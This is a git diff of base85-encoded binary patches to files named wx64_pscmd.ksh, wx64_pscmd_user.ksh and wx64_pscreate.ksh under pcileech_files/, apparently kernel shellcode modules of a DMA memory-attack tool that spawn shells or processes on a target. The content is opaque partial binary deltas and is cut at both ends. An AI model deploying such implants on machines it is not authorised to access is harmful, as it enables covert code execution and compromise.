zYWt%>4OS2iBJc;n8$k&}W-*q3SPErGKV;D&1HqzVeQ$Sge7^7JJ)Y;i=lxSVTG!fK
zTRw5}+28W6V0)^w{Q*rstnE!jzZw@-hl-6gn|}YB@AaHcds?<@d~4CzH*sp;gjd+p
zMe-)aK5tO0Y%NXlIvvUDS93e9E4hiNja!_4WZ?ONVRnWOar}89c~G$MNA<}w!hXJ_
zPYw(9d|sa%6PCgkNy$>BQlVSrDfDD#T`kKbb&6J!+C&@4KS?=lqI{d^xVE;fS(Wyu
z4U0{7XtS#OZx8u=s&=yaG^N!<*t4j?%kGa9-mA$6Rjn96u&E}9U?(Z;iXb>ha*cyd
zFar`e#kL%?sOMr3UT_XXC)XmAVuRlhRv-f48oPU^?=?aRq95E~4RbSDgkKOrPzQ!U
zGhQnx(FkUVXlL)j=UV5H9FPf3IuXaU=w<1#Ob**VxRmAsj4d5V!1cprH5X)cP5(yW
zLU5U?i$?(V@m0?{N%3lB%qmoTJno^qD{-m!$Yn4!_9Q$ofRO$DeANIhyqq5%1Wm2B
z+)a`^n4-sqHT84|-KagK*3QS(w#OQG;8)|-lPXt4EBhd>Z@t*9ejvrGXH}w1TV(+G
zf{El}=@71%<Qh`^7zIbMAA7kQUpka~qI&mk*>85s*DY>&#Ojtmb>|AnLE~{Qlbkdj
L<}$O(Mp6GC-ed`#

diff --git a/pcileech_files/wx64_pscmd.ksh b/pcileech_files/wx64_pscmd.ksh
index e53a3e1bd39dd0c79f016bbd65e9fe68b08dc4ae..95a3527c3c9bb9f66d32cc7ba967cf0c25780330 100644
GIT binary patch
delta 3624
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
We!@WU`>R)!S^x8n(i>T{yXZfue<8I1

delta 4463
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

diff --git a/pcileech_files/wx64_pscmd_user.ksh b/pcileech_files/wx64_pscmd_user.ksh
index 22000c962f03819db1af0ea88b85fc7aae64e59a..fe610accd4c7be1b96167933206d16e93f21d0c2 100644
GIT binary patch
delta 3624
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
Z^7Ho-28!RGzoJb0pLdj=`gv^y{{g_fA}0U<

delta 4463
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

diff --git a/pcileech_files/wx64_pscreate.ksh b/pcileech_files/wx64_pscreate.ksh
index 70f13edef11d3cae87de0a56e1f9d269e3fcef2a..8392b79e2c065882e6912bb437ac41f6cd178ddc 100644
GIT binary patch
delta 3596
zcmY+{4{X%s9mnxsuPq#Z)}9uj3nC|;?nc?XiAYULxXL~9l%8;`3_B@Ww`wlhZ5J)l
zX|rp0JX<e6E`SF@BFs88A+gJd;8F@<r>#8vDcEde7G+y?4W4N?yNpGI!f)^A&c*GL
z_Fnh>J-_Go{GQ+E_x$eOs!>(TmX?iIuX*#XmrFcl;j`~AytDnm`OmF=FZxRH&dMbZ
z?Du-tjHRjzto-Y@<@xtj{``CMj+#4mM2c=(FYU`RF*+d=<KFCNw^)|6FFo2{>K*Pc
zoz_3N<7aObb+ALavtVxey9Lj<ddku#3WBcR6{p><JudgG^silE*GpaL3D+mCjW->-
